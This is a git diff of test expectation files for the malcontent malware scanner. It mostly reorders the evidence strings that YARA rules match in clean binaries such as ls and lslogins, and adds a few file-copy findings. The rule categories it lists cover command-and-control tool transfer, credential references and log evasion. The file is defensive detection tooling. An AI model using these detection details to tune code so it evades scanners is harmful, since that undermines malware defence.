[zstd](https://github.com/search?q=zstd&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code)
[MD5_Update](https://github.com/search?q=MD5_Update&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Update](https://github.com/search?q=MD5_Update&type=code)
[MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [ENV](https://github.com/search?q=ENV&type=code)
[USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code)
[ENV](https://github.com/search?q=ENV&type=code) | +| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [getenv](https://github.com/search?q=getenv&type=code)
[LANG](https://github.com/search?q=LANG&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [plugin_state_location](https://github.com/search?q=plugin_state_location&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | @@ -92,23 +92,23 @@ | LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | | LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/pki/tls/certs/ca-bundle.crt](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crt&type=code)
[/etc/ssl/certs/ca-certificates.crt](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crt&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/cmake/3.30.4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fcmake%2F3.30.4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/ssl/certs/ca-certificates.crt](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crt&type=code)
[/etc/pki/tls/certs/ca-bundle.crt](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crt&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/cmake/3.30.4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fcmake%2F3.30.4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code) | | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/plutil](https://github.com/search?q=%2Fusr%2Fbin%2Fplutil&type=code) | | LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchown) | May change file ownership | [fchown](https://github.com/search?q=fchown&type=code) | | LOW | [fs/proc/pid_statistics](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-statistics.yara#proc_pid_stat_val) | access process stats using /pid/%d/stat | [/proc/%d/stat](https://github.com/search?q=%2Fproc%2F%25d%2Fstat&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | +| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[TEMP](https://github.com/search?q=TEMP&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) | +| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code)
[mkdtemp](https://github.com/search?q=mkdtemp&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [mktemp](https://github.com/search?q=mktemp&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [net/ftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ftp/ftp.yara#ftp) | File Transfer Protocol (FTP) | [EPSV](https://github.com/search?q=EPSV&type=code) | | LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | | LOW | [net/http/accept_encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | | LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth) | makes HTTP requests with Bearer authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [User-Agent](https://github.com/search?q=User-Agent&type=code)
[HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code) | | LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | | LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | @@ -116,6 +116,6 @@ | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd "](https://github.com/search?q=cd+%22&type=code)
[cd /d](https://github.com/search?q=cd+%2Fd&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /d](https://github.com/search?q=cd+%2Fd&type=code)
[cd "](https://github.com/search?q=cd+%22&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/emscripten.sh.simple b/tests/linux/clean/emscripten.sh.simple index 33ff9332d..65785bbd3 100644 --- a/tests/linux/clean/emscripten.sh.simple +++ b/tests/linux/clean/emscripten.sh.simple @@ -3,6 +3,7 @@ c2/tool_transfer/download: medium c2/tool_transfer/shell: medium evasion/file/location/HOME: medium evasion/file/prefix: medium +fs/file/copy: medium fs/file/delete: medium fs/file/delete_forcibly: low fs/file/make_executable: medium diff --git a/tests/linux/clean/linux-s390x.sh.simple b/tests/linux/clean/linux-s390x.sh.simple index fdf621add..a26644f60 100644 --- a/tests/linux/clean/linux-s390x.sh.simple +++ b/tests/linux/clean/linux-s390x.sh.simple @@ -2,6 +2,7 @@ c2/tool_transfer/github: medium c2/tool_transfer/shell: medium fs/directory/create: low +fs/file/copy: medium fs/permission/modify: medium net/download/fetch: medium net/url/embedded: low diff --git a/tests/linux/clean/linux-sparc64.sh.simple b/tests/linux/clean/linux-sparc64.sh.simple index 92672f8cb..07380a417 100644 --- a/tests/linux/clean/linux-sparc64.sh.simple +++ b/tests/linux/clean/linux-sparc64.sh.simple @@ -1,6 +1,7 @@ # linux/clean/linux-sparc64.sh: medium c2/tool_transfer/shell: medium fs/directory/create: low +fs/file/copy: medium fs/permission/modify: medium net/download/fetch: medium net/url/embedded: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index 3ac833a5e..8dd8d13c0 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -3,11 +3,11 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | | LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index dae48e15c..d18273766 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -9,18 +9,18 @@ | MEDIUM | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#historical_logins) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) | | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/](https://github.com/search?q=%2Ftmp%2F&type=code) | -| MEDIUM | [fs/path/var_log](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var-log.yara#var_log_path) | path reference within /var/log | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) | +| MEDIUM | [fs/path/var_log](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var-log.yara#var_log_path) | path reference within /var/log | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/](https://github.com/search?q=%2Fproc%2F%25d%2F&type=code)
[/proc/%zu](https://github.com/search?q=%2Fproc%2F%25zu&type=code) | | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Login by password disabled](https://github.com/search?q=Login+by+password+disabled&type=code)
[Password changed](https://github.com/search?q=Password+changed&type=code)
[Password expiration warn](https://github.com/search?q=Password+expiration+warn&type=code)
[Password is locked](https://github.com/search?q=Password+is+locked&type=code)
[Password not required](https://github.com/search?q=Password+not+required&type=code)
[date of last password change](https://github.com/search?q=date+of+last+password+change&type=code)
[info about passwords expiration](https://github.com/search?q=info+about+passwords+expiration&type=code)
[is warned of password expiration](https://github.com/search?q=is+warned+of+password+expiration&type=code)
[login by password disabled](https://github.com/search?q=login+by+password+disabled&type=code)
[password defined](https://github.com/search?q=password+defined&type=code)
[password expiration date](https://github.com/search?q=password+expiration+date&type=code)
[password not defined](https://github.com/search?q=password+not+defined&type=code)
[to login by password](https://github.com/search?q=to+login+by+password&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [is warned of password expiration](https://github.com/search?q=is+warned+of+password+expiration&type=code)
[info about passwords expiration](https://github.com/search?q=info+about+passwords+expiration&type=code)
[date of last password change](https://github.com/search?q=date+of+last+password+change&type=code)
[Login by password disabled](https://github.com/search?q=Login+by+password+disabled&type=code)
[login by password disabled](https://github.com/search?q=login+by+password+disabled&type=code)
[Password expiration warn](https://github.com/search?q=Password+expiration+warn&type=code)
[password expiration date](https://github.com/search?q=password+expiration+date&type=code)
[Password not required](https://github.com/search?q=Password+not+required&type=code)
[password not defined](https://github.com/search?q=password+not+defined&type=code)
[to login by password](https://github.com/search?q=to+login+by+password&type=code)
[Password is locked](https://github.com/search?q=Password+is+locked&type=code)
[Password changed](https://github.com/search?q=Password+changed&type=code)
[password defined](https://github.com/search?q=password+defined&type=code) | | LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code) | | LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | | LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/hushlogins](https://github.com/search?q=%2Fetc%2Fhushlogins&type=code)
[/etc/login.defs](https://github.com/search?q=%2Fetc%2Flogin.defs&type=code)
[/etc/nologin](https://github.com/search?q=%2Fetc%2Fnologin&type=code)
[/etc/passwd](https://github.com/search?q=%2Fetc%2Fpasswd&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code)
